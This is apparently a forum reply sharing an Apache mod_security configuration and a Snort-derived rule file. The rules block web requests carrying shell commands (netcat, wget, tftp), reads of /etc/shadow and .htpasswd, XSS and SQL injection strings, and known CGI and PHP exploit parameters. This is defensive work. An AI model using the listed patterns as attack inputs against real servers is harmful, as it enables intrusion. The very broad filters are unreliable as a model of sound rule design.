Hello,
Ok you speak about Network traffic, not cpu usage.
There is a lot of scanner that try to connect to your box or does DOS attack, etc …
Maybe the traffic come from this sort of pbm.
I think you’ve installed APF ?
If yes, Just look at your /var/log/messages and /var/log/secure and try to figure out if there is a lot of DROP packets.
I recommand you to also install BFD (brut force detection) from rxfn.
And finally you asked about mod_security.
So here is my rule set.
I have configured a file in /etc/httpd/conf.d/ named mod_security.conf
here is the file
mod_security
LoadModule security_module modules/mod_security.so
<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On
# Change Server: string
SecServerSignature " "
# Make sure that URL encoding is valid
SecFilterCheckURLEncoding On
# This setting should be set to On only if the Web site is
# using the Unicode encoding. Otherwise it may interfere with
# the normal Web site operation.
SecFilterCheckUnicodeEncoding Off
# Only allow bytes from this range
SecFilterForceByteRange 1 255
# The audit engine works independently and
# can be turned On of Off on the per-server or
# on the per-directory basis. "On" will log everything,
# "DynamicOrRelevant" will log dynamic requests or violations,
# and "RelevantOnly" will only log policy violations
SecAuditEngine RelevantOnly
# The name of the audit log file
SecAuditLog /var/log/httpd/audit_log
# Should mod_security inspect POST payloads
SecFilterScanPOST On
# Action to take by default
SecFilterDefaultAction "deny,log,status:500"
# Require HTTP_USER_AGENT and HTTP_HOST in all requests
SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"
# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"
# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
# Import our snort converted modsec rules
Include /etc/httpd/conf.d/mod_sec.snort.conf
</IfModule>
You may see that I have an include command which one include an other file (: mod_sec.snort.conf) to complete the rules
Why an other file ?
It easily allow me to remove these rules when my server is very busy
The mod_sec.snort.conf is my dedicated and personnal file from the snort rules
here is the file : mod_sec.snort.conf
WEB-ATTACKS ps command attempt
SecFilterSelective THE_REQUEST “/bin/ps”
WEB-ATTACKS /bin/ps command attempt
SecFilterSelective THE_REQUEST “ps\x20”
WEB-ATTACKS wget command attempt
SecFilter “wget\x20”
WEB-ATTACKS uname -a command attempt
SecFilter “uname\x20-a”
WEB-ATTACKS /usr/bin/id command attempt
SecFilterSelective THE_REQUEST “/usr/bin/id”
WEB-ATTACKS id command attempt
SecFilter “;id”
WEB-ATTACKS kill command attempt
SecFilterSelective THE_REQUEST “/bin/kill”
WEB-ATTACKS chsh command attempt
SecFilterSelective THE_REQUEST “/usr/bin/chsh”
WEB-ATTACKS tftp command attempt
SecFilter “tftp\x20”
WEB-ATTACKS /usr/bin/gcc command attempt
SecFilterSelective THE_REQUEST “/usr/bin/gcc”
WEB-ATTACKS gcc command attempt
SecFilter “gcc\x20-o”
WEB-ATTACKS /usr/bin/cc command attempt
SecFilterSelective THE_REQUEST “/usr/bin/cc”
WEB-ATTACKS cc command attempt
SecFilter “cc\x20”
WEB-ATTACKS /usr/bin/cpp command attempt
SecFilterSelective THE_REQUEST “/usr/bin/cpp”
WEB-ATTACKS cpp command attempt
SecFilter “cpp\x20”
WEB-ATTACKS /usr/bin/g++ command attempt
SecFilterSelective THE_REQUEST “/usr/bin/g++”
WEB-ATTACKS g++ command attempt
SecFilter “g++\x20”
WEB-ATTACKS bin/python access attempt
SecFilterSelective THE_REQUEST “bin/python”
WEB-ATTACKS python access attempt
SecFilter “python\x20”
WEB-ATTACKS bin/tclsh execution attempt
SecFilter “bin/tclsh”
WEB-ATTACKS tclsh execution attempt
SecFilter “tclsh8\x20”
WEB-ATTACKS bin/nasm command attempt
SecFilterSelective THE_REQUEST “bin/nasm”
WEB-ATTACKS nasm command attempt
SecFilter “nasm\x20”
WEB-ATTACKS perl execution attempt
SecFilter “perl\x20”
WEB-ATTACKS traceroute command attempt
SecFilter “traceroute\x20”
WEB-ATTACKS ping command attempt
SecFilterSelective THE_REQUEST “/bin/ping”
WEB-ATTACKS netcat command attempt
SecFilter “nc\x20”
WEB-ATTACKS nmap command attempt
SecFilter “nmap\x20”
WEB-ATTACKS xterm command attempt
SecFilterSelective THE_REQUEST “/usr/X11R6/bin/xterm”
WEB-ATTACKS X application to remote host attempt
SecFilter “\x20-display\x20”
WEB-ATTACKS lsof command attempt
SecFilter “lsof\x20”
WEB-ATTACKS rm command attempt
SecFilter “rm\x20”
WEB-ATTACKS mail command attempt
SecFilterSelective THE_REQUEST “/bin/mail”
WEB-ATTACKS mail command attempt
SecFilter “mail\x20”
WEB-ATTACKS /bin/ls command attempt
SecFilterSelective THE_REQUEST “/bin/ls”
WEB-ATTACKS /etc/shadow access
SecFilter “/etc/shadow”
WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST “.htgroup”
WEB-CGI websitepro path access
SecFilter " /HTTP/1."
WEB-CGI formmail arbitrary command execution attempt
SecFilterSelective THE_REQUEST “/formmail” chain
SecFilter “\x0a”
WEB-CGI formmail access
SecFilterSelective THE_REQUEST “/formmail” log,pass
WEB-CGI phf arbitrary command execution attempt
SecFilterSelective THE_REQUEST “/phf” chain
SecFilter “\x0a/”
WEB-CGI phf access
SecFilterSelective THE_REQUEST “/phf” log,pass
WEB-CGI rksh access
SecFilterSelective THE_REQUEST “/rksh”
WEB-CGI bash access
SecFilterSelective THE_REQUEST “/bash” log,pass
WEB-CGI zsh access
SecFilterSelective THE_REQUEST “/zsh”
WEB-CGI csh access
SecFilterSelective THE_REQUEST “/csh”
WEB-CGI tcsh access
SecFilterSelective THE_REQUEST “/tcsh”
WEB-CGI rsh access
SecFilterSelective THE_REQUEST “/rsh”
WEB-CGI ksh access
SecFilterSelective THE_REQUEST “/ksh”
WEB-CLIENT Javascript URL host spoofing attempt
SecFilter “javascript://”
WEB-MISC cross site scripting (img src=javascript) attempt
SecFilter “img src=javascript”
WEB-MISC .htpasswd access
SecFilter “.htpasswd”
WEB-MISC .htaccess access
SecFilter “.htaccess”
WEB-MISC cd…
SecFilter “cd..”
WEB-MISC ///cgi-bin access
SecFilterSelective THE_REQUEST “///cgi-bin”
WEB-MISC /cgi-bin/// access
SecFilterSelective THE_REQUEST “/cgi-bin///”
WEB-MISC /~root access
SecFilterSelective THE_REQUEST “/~root”
WEB-MISC /~ftp access
SecFilterSelective THE_REQUEST “/~ftp”
WEB-MISC cat%20 access
SecFilter “cat\x20”
WEB-MISC rpm_query access
SecFilterSelective THE_REQUEST “/rpm_query”
WEB-MISC htgrep attempt
SecFilterSelective THE_REQUEST “/htgrep” chain
SecFilter “hdr=/”
WEB-MISC htgrep access
SecFilterSelective THE_REQUEST “/htgrep” log,pass
WEB-MISC .history access
SecFilterSelective THE_REQUEST “/.history”
WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST “/.bash_history”
WEB-MISC /~nobody access
SecFilterSelective THE_REQUEST “/~nobody”
WEB-MISC *%0a.pl access
SecFilterSelective THE_REQUEST “/*\x0a.pl”
WEB-MISC Apache Chunked-Encoding worm attempt
SecFilter “CCCCCCC: AAAAAAAAAAAAAAAAAAA”
WEB-MISC Transfer-Encoding: chunked
SecFilter “chunked”
WEB-PHP squirrel mail theme arbitrary command attempt
SecFilterSelective THE_REQUEST “/left_main.php” chain
SecFilter “cmdd=”
WEB-PHP DNSTools administrator authentication bypass attempt
SecFilterSelective THE_REQUEST “/dnstools.php” chain
SecFilter “user_dnstools_administrator=true”
WEB-PHP DNSTools authentication bypass attempt
SecFilterSelective THE_REQUEST “/dnstools.php” chain
SecFilter “user_logged_in=true”
WEB-PHP DNSTools access
SecFilterSelective THE_REQUEST “/dnstools.php” log,pass
WEB-PHP Blahz-DNS dostuff.php modify user attempt
SecFilterSelective THE_REQUEST “/dostuff.php?action=modify_user”
WEB-PHP Blahz-DNS dostuff.php access
SecFilterSelective THE_REQUEST “/dostuff.php” log,pass
WEB-PHP PHP-Wiki cross site scripting attempt
SecFilterSelective THE_REQUEST “<script”
WEB-PHP strings overflow
SecFilterSelective THE_REQUEST “?STRENGUR”
WEB-PHP PHPLIB remote command attempt
SecFilter “_PHPLIB[libdir]”
to create these files do :
first save your old security.conf file
cd /etc/httpd/conf.d/
cp security.conf security.back
rm -f security.conf
then create the mod_security.conf file and copy paste mine
touch mod_security.conf
vi mod_securtity.conf
press “Inser”
copy and paste my data
finally create the file mod_sec.snort.conf and copy and paste my data
touch mod_sec.snort.conf
vi mod_sec.snort.conf
press “Inser”
copy and paste my data
Hope this will help you
Pascal